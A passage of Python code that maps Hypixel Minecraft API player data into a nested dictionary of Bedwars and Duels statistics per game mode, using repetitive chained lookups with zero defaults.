"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_diamond_resources_collected_bedwars", 0),
}
}
},
"castle": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_void_deaths", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("castle_wins_bedwars",
0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_iron_resources_collected_bedwars", 0),
"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_diamond_resources_collected_bedwars", 0),
}
},
"lucky_blocks": {
"doubles": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_void_deaths", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_iron_resources_collected_bedwars", 0),
"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_diamond_resources_collected_bedwars", 0),
}
},
"fours": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_void_deaths", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_iron_resources_collected_bedwars", 0),
"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_diamond_resources_collected_bedwars", 0),
}
}
},
"rush": {
"solo": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_deaths_bedwars", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_final_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_void_deaths", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_iron_resources_collected_bedwars", 0),
"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_diamond_resources_collected_bedwars", 0),
}
},
"doubles": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_void_deaths", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_iron_resources_collected_bedwars", 0),
"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_diamond_resources_collected_bedwars", 0),
}
},
"fours": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_void_deaths", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_iron_resources_collected_bedwars", 0),
"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_diamond_resources_collected_bedwars", 0),
}
}
},
"ultimate": {
"solo": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_void_deaths", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_iron_resources_collected_bedwars", 0),
"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_diamond_resources_collected_bedwars", 0),
}
},
"doubles": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_void_deaths", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_iron_resources_collected_bedwars", 0),
"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_diamond_resources_collected_bedwars", 0),
}
},
"fours": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_void_deaths", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_iron_resources_collected_bedwars", 0),
"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_diamond_resources_collected_bedwars", 0),
}
}
},
"voidless": {
"doubles": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_void_deaths", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_iron_resources_collected_bedwars", 0),
"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_diamond_resources_collected_bedwars", 0),
}
},
"fours": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_void_deaths", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_iron_resources_collected_bedwars", 0),
"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_diamond_resources_collected_bedwars", 0),
}
}
}
}
},
"duels": {
"coins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("coins", 0),
"games_played": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("games_played_duels",
0),
"wins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("wins", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("losses", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("kills", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("deaths", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("current_winstreak", 0),
"bow": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bow_duel_rounds_played", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bow_duel_kills", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bow_duel_deaths", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bow_duel_wins", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bow_duel_losses", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"current_bow_winstreak", 0),
"bow_shots": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bow_duel_bow_shots",
0),
"bow_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bow_duel_bow_hits", 0),
"damage_dealt": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bow_duel_damage_dealt", 0),
},
"bridge": {
"solo": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_duel_rounds_played", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bridge_duel_kills",
0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bridge_duel_deaths",
0),
"wins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bridge_duel_wins", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bridge_duel_losses",
0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"current_bridge_winstreak", 0),
"melee_swings": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_duel_melee_swings", 0),
"melee_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_duel_melee_hits", 0),
"bow_shots": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_duel_bow_shots", 0),
"bow_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_duel_bow_hits", 0),
"damage_dealt": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_duel_damage_dealt", 0),
},
"doubles": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_doubles_rounds_played", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bridge_doubles_kills",
0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_doubles_deaths", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bridge_doubles_wins",
0),
"losses": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_doubles_losses", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"current_bridge_winstreak", 0),
"melee_swings": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_doubles_melee_swings", 0),
"melee_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_doubles_melee_hits", 0),
"bow_shots": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_doubles_bow_shots", 0),
"bow_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_doubles_bow_hits", 0),
"damage_dealt": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_doubles_damage_dealt", 0),
},
"fours": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_four_rounds_played", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bridge_four_kills",
0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bridge_four_deaths",
0),
"wins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bridge_four_wins", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bridge_four_losses",
0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"current_bridge_winstreak", 0),
